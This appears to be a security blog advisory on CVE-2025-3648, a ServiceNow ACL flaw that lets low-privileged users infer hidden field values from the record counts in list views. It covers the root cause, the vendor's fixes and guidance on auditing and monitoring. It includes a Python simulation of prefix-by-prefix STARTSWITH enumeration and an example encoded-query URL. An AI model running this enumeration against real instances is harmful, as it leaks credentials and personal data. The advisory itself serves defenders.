CyberDudeBivash Intel Report: ServiceNow “Count(er) Strike” Rounds Delivered — CVE-2025-3648 Exposes Your Data By CyberDudeBivash — Cybersecurity Authority
1. Headline Alert
ServiceNow’s Now Platform suffered a high-severity data inference flaw, tracked as CVE-2025-3648 and dubbed “Count(er) Strike”. It lets low-privileged users, and on some instances anonymous or self-registered users, extract sensitive field values without ever reading a record: they filter a list view and watch the record counts the UI still reports.
Varonis Threat Labs discovered the flaw in February 2024 and disclosed it publicly in July 2025. ServiceNow says the issue was fully addressed by May 2025 and has introduced new ACL types in the Xanadu and Yokohama releases. The fix is not automatic on the data side: if your ACLs were never audited and migrated to the new controls, you are still at risk.
2. Technical Breakdown
Root Cause & ACL Flaws
ServiceNow Access Control Lists (ACLs) evaluate four conditions:
- Required Roles
- Security Attributes
- Data Conditions
- Script Conditions
Within a single ACL a user must satisfy all four conditions. But when several ACLs apply to the same table and operation, passing any one of them is enough (the default “allow if any” evaluation), so one weakly gated ACL undoes a strict one sitting next to it. The leak comes from how a failure is reported: a user who fails the required roles or security attributes is denied outright, but a user who fails only the data condition or the script condition still has the query executed, and the list view reports how many rows were removed by security constraints. That count alone gives an attacker enough signal to infer what the hidden rows contain.
Enumeration via UI Count Leak
Attackers exploit this by submitting list filters with prefix or substring operators (STARTSWITH, CONTAINS) and reading the resulting record count. A count greater than zero confirms the guessed prefix; extending it one character at a time recovers the full value, and the same trick works across any field on the table. The attacker never sees the data itself, only the counts.
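The enumeration loop described above, as an added example that is not part of the original report or of Varonis’s tooling. The “oracle” is a constructed in-memory stand-in for a list view whose read ACL is gated only by a data or script condition, so every filter returns a row count; a second oracle models the fixed behaviour, where rows the user may not read are filtered before the query runs. The sysparm_query form in the comment is shown only to tie the simulation back to the UI and is an assumption, not taken from the page.

```python
"""Simulated Count(er) Strike enumeration against a count oracle.

Constructed example: `leaky_oracle` stands in for a ServiceNow list view on a
table whose read ACL fails only on a data or script condition, so the UI still
reports how many rows matched a filter. No real instance or request is used.
"""
import string
from typing import Callable, List, Tuple

# Constructed table contents. The attacker never sees these values directly.
SECRET_ROWS = [
    {"user_name": "alice", "token": "A7f3Kq"},
    {"user_name": "bob",   "token": "Zx91pL"},
    {"user_name": "car",   "token": "Q2mN8v"},
    {"user_name": "carol", "token": "Q2mN8v"},
]

Oracle = Callable[[str, str, str], int]


def leaky_oracle(field: str, op: str, value: str) -> int:
    """Count a misconfigured instance reveals: the filter runs over all rows,
    the ACL then hides them, and the removed-row count is displayed."""
    if op == "STARTSWITH":
        return sum(1 for r in SECRET_ROWS if r[field].startswith(value))
    if op == "CONTAINS":
        return sum(1 for r in SECRET_ROWS if value in r[field])
    raise ValueError(f"unsupported operator {op}")


def hardened_oracle(field: str, op: str, value: str) -> int:
    """Behaviour once rows the user may not read are filtered at query time
    (Query ACL / Security Data Filter): every probe returns 0."""
    return 0


def encoded_query(field: str, op: str, value: str) -> str:
    """Encoded-query term the probe would carry in sysparm_query, e.g.
    /sys_user_list.do?sysparm_query=user_nameSTARTSWITHal (assumed form)."""
    return f"{field}{op}{value}"


def infer_values(oracle: Oracle, field: str,
                 alphabet: str = string.ascii_letters + string.digits,
                 max_len: int = 32) -> Tuple[List[str], int]:
    """Recover every value of `field` one character at a time using only
    STARTSWITH counts. Returns (sorted values found, number of probes)."""
    found: List[str] = []
    probes = 0

    def probe(prefix: str, n_prefix: int) -> None:
        nonlocal probes
        children = []
        child_total = 0
        for ch in alphabet:
            probes += 1
            n = oracle(field, "STARTSWITH", prefix + ch)
            if n:
                children.append((prefix + ch, n))
                child_total += n
        # Rows matching the prefix but none of its extensions end exactly
        # here, so the prefix is itself a complete value (possibly repeated).
        if prefix and n_prefix > child_total:
            found.extend([prefix] * (n_prefix - child_total))
        if len(prefix) < max_len:
            for child, n in children:
                probe(child, n)

    probe("", oracle(field, "STARTSWITH", ""))
    return sorted(found), probes


if __name__ == "__main__":
    values, n = infer_values(leaky_oracle, "token")
    print(f"recovered {values} with {n} probes")   # tokens were never displayed
    print(infer_values(hardened_oracle, "token"))  # ([], 62)
```

Each probe is one list request; with a 62-character alphabet the cost is roughly 62 requests per character recovered, which is why the detection guidance later in this report keys on bursts of distinct STARTSWITH values against one field.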
3. Impact Snapshots
- Severity: High (CVSS 8.2)
- Exposed Data: PII, credentials, internal configuration, across ITSM, HR, GRC, CSM and any other application whose tables carry weak read ACLs.
- Attack Vector: Minimal privileges; a low-privileged account suffices, and on instances that allow self-registration or anonymous access, no real account at all.
- Reach: Any ServiceNow instance where read ACLs on sensitive tables rely on data or script conditions without a role or security-attribute gate.
CIO.com warned that admins must fix ACLs immediately. Forrester and IDC analysts echoed urgency, labeling it a “high-priority” systemic risk.
4. ServiceNow’s Defense Measures
ServiceNow states the issue was fully addressed by May 2025, and the Xanadu and Yokohama releases add new ACL types that close the inference channel:
- Deny-Unless ACLs: access is granted only when every applicable Deny-Unless ACL passes, instead of when any one Allow ACL passes.
- Query ACLs: apply the access filter to the query itself, so rows the user may not read are never fetched and cannot be counted.
- Security Data Filters: remove rows at query time, so the “rows removed by security constraints” count and similar metadata that enable inference are no longer shown.
ServiceNow urges admins to review KBs (e.g., KB2139567) and reconfigure tables accordingly.
5. CyberDudeBivash Tactical Guidance
Immediate Actions
- Patch Now: confirm your instance is on a release that carries the May 2025 security patch.
- Audit All ACLs: find read ACLs on sensitive tables that have no required role and no security attribute, and remember that one such ACL undoes every strict ACL beside it under “allow if any”.
- Apply New Controls: deploy Deny-Unless ACLs, Query ACLs and Security Data Filters on sensitive tables.
- Test Enumeration Risks: log in as a low-privileged (and, if enabled, self-registered) user, filter sensitive tables with STARTSWITH, and check whether a removed-row count appears.
- Lock Down Self-Registration: restrict or disable it unless it is essential.
Strategic Imperatives
- Enforce a least-privilege posture across the board: every read ACL on a sensitive table needs a role or security-attribute gate, not just a data or script condition.
- Integrate continuous audit of ACL configuration so a newly created weak ACL is caught before it undoes the strict ones around it.
- Employ real-time monitoring to flag unusual query patterns, such as bursts of STARTSWITH or CONTAINS filters with incrementally longer values against one field, and other metadata-leak indicators.
- Educate admins: “default deny” is no longer optional, it is mandatory.
6. Summary Table: What You Must Know
| Element | Details |
|---|---|
| CVE ID | CVE-2025-3648 (“Count(er) Strike”) |
| Severity | High (CVSS 8.2) |
| Discovery | Varonis Threat Labs (discovered Feb 2024, disclosed Jul 2025) |
| Weakness | ACL logic that reports removed-row counts when only a data or script condition fails, made worse by “allow if any” across multiple ACLs |
| Impact | Data inference via UI record counts: credentials, PII, configuration |
| Attack Ease | Low: list filtering and counting only, no code execution or admin rights |
| Fix Released | Addressed by May 2025; new ACL types (Deny-Unless, Query ACLs, Security Data Filters) in the Xanadu and Yokohama releases |
| Your Task | Patch, audit ACLs, apply new controls, and monitor |
CyberDudeBivash Executive Verdict
Count(er) Strike is a ticking data time-bomb. Attackers don’t need code execution or admin privileges; they just need to see a count. This is a demonstrated technique against misconfigured environments, not a theoretical one.
If your ACLs aren’t updated, you are leaking sensitive data. End of story. Act immediately.
#CyberDudeBivash #CVE20253648 #ServiceNow #CountErStrike #DataEnumeration #AccessControl #CyberSecurity #PatchNow #ZeroTrust #ThreatIntel